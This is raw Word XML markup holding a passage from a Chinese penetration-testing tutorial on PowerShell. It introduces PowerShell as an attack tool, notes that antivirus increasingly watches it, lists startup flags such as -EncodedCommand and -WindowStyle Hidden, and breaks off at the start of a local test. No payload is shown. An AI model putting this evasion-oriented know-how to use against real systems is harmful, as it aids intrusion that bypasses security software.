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10.874pt;width:4.125pt;height:457.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,6217" coordsize="82,9142">
        <v:shape style="position:absolute;left:1177;top:6217;width:82;height:9142" coordorigin="1177,6217" coordsize="82,9142" path="m1217,6222l1217,6222,1217,6222,1217,6222,1217,6222,1217,6222,1217,6223,1217,6223,1217,6224,1217,6225,1217,6226,1217,6228,1217,6229,1217,6231,1217,6234,1217,6237,1217,6240,1217,6244,1217,6249,1217,6254,1217,6259,1217,6265,1217,6272,1217,6280,1217,6288,1217,6297,1217,6307,1217,6317,1217,6329,1217,6341,1217,6354,1217,6368,1217,6383,1217,6400,1217,6417,1217,6435,1217,6454,1217,6475,1217,6496,1217,6519,1217,6543,1217,6569,1217,6595,1217,6623,1217,6653,1217,6683,1217,6716,1217,6749,1217,6784,1217,6821,1217,6859,1217,6899,1217,6940,1217,6983,1217,7028,1217,7075,1217,7123,1217,7173,1217,7225,1217,7279,1217,7334,1217,7392,1217,7451,1217,7513,1217,7576,1217,7642,1217,7709,1217,7779,1217,7851,1217,7925,1217,8001,1217,8079,1217,8160,1217,8243,1217,8329,1217,8416,1217,8506,1217,8599,1217,8694,1217,8792,1217,8892,1217,8994,1217,9100,1217,9208,1217,9318,1217,9431,1217,9547,1217,9666,1217,9788,1217,9912,1217,10039,1217,10169,1217,10302,1217,10438,1217,10577,1217,10719,1217,10865,1217,11013,1217,11164,1217,11318,1217,11476,1217,11637,1217,11801,1217,11968,1217,12139,1217,12313,1217,12490,1217,12671,1217,12855,1217,13043,1217,13234,1217,13429,1217,13627,1217,13829,1217,14035,1217,14244,1217,14457,1217,14674,1217,14894,1217,15119,1217,15347e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7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95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知</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>识点介绍：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18" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="21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PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.NET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="22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Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>技术为基础，并且与现有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>保持向后兼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>容，因此它的脚本程序不仅能访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.NET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="10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CLR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，也能使用现有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>技术。同时也包含了数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>种系统管理工具、简易且一致的语法，提升管理者处理，常见如登录数据库、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exchange</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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2007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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Center</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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Operations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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Manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等服务器软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>都将内置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1660" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的强大，并且内置，在渗透过程中，也让渗透变得更加有趣。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53" w:lineRule="auto"/>
        <w:ind w:left="1660" w:right="3954" w:firstLine="-540"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>而安全软件的对抗查杀也逐渐开始针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一切行为。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia="Verdana"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://technet.microsoft.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，看到文档如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="656565"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="19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Here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is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a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listing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of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available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startup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parameters:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="206" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="212" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="223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-Command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Specifies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command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text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execute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though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it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were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typed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at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command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-2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prompt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="238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-EncodedCommand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Specifies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base64-encoded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command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5b2498"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>text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  <w:spacing w:val="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execute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07" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="422" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="244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-ExecutionPolicy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default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execution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policy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  <w:spacing w:val="-8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session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-File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name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of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a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script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fi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execute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12" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="181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-InputFormat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format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data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sent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either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5b2498"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>text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string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serialized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XML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default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format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XML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Valid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values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are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5b2498"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>text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and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="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XML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37" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="212" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="160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-NoExit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Does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not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exit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after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running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startup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commands.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This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parameter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useful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when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you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run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commands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scripts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via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command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prompt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="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(cmd.exe).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="238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-NoLogo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Starts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without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displaying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copyright</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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banner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="206" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="212" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="1495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-Noninteractive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Starts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non-interactive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mode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this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mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,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does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not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present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an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interactive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prompt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  <w:spacing w:val="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user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38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-NoProfile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Tells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not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load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current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user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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profile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06" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="212" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="139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-OutputFormat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format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output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either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5b2498"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>text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string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serialized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XML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default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format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5b2498"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>text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Valid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values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are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5b2498"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>text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XML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36" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="212" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="139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-PSConsoleFile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Loads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specified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Windows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file.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files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end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with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.psc1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extension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can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be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used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ensure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that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specific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snap-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>in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extensions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are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loaded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and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available.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You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can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create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a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console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file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using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Export-Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6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Windows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PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="238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-Sta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Starts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single-threaded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mode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07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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Version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version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of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Windows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PowerShell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to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use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for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compatibility,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such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as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="1b00ce"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="206" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="212" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="1705" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-WindowStyle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Sets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window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style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as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Normal,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Minimized,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Maximized,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or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Hidden.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-7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The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default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a90c90"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-3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Normal.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112.874pt;width:4.125pt;height:25.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,2257" coordsize="82,502">
        <v:shape style="position:absolute;left:1177;top:2257;width:82;height:502" coordorigin="1177,2257" coordsize="82,502" path="m1217,2260l1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2261,1217,2261,1217,2261,1217,2261,1217,2261,1217,2261,1217,2262,1217,2262,1217,2262,1217,2262,1217,2263,1217,2263,1217,2264,1217,2264,1217,2265,1217,2265,1217,2266,1217,2266,1217,2267,1217,2268,1217,2269,1217,2269,1217,2270,1217,2271,1217,2272,1217,2273,1217,2275,1217,2276,1217,2277,1217,2278,1217,2280,1217,2281,1217,2283,1217,2284,1217,2286,1217,2288,1217,2290,1217,2292,1217,2294,1217,2296,1217,2298,1217,2300,1217,2303,1217,2305,1217,2308,1217,2310,1217,2313,1217,2316,1217,2319,1217,2322,1217,2325,1217,2328,1217,2331,1217,2335,1217,2338,1217,2342,1217,2346,1217,2350,1217,2354,1217,2358,1217,2362,1217,2367,1217,2371,1217,2376,1217,2380,1217,2385,1217,2390,1217,2395,1217,2401,1217,2406,1217,2412,1217,2417,1217,2423,1217,2429,1217,2435,1217,2441,1217,2448,1217,2454,1217,2461,1217,2468,1217,2475,1217,2482,1217,2489,1217,2497,1217,2504,1217,2512,1217,2520,1217,2528,1217,2537,1217,2545,1217,2554,1217,2563,1217,2572,1217,2581,1217,2590,1217,2600,1217,2609,1217,2619,1217,2629,1217,2639,1217,2650,1217,2661,1217,2671,1217,2682,1217,2694,1217,2705,1217,2717,1217,2728,1217,2740e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:156.600pt;width:467.400pt;height:148.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:323.399pt;width:467.400pt;height:150.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:555.600pt;width:467.400pt;height:53.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:690.600pt;width:291.600pt;height:82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针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对它的特性，本地测试：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5" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="212" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="5592" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Type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-AssemblyName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
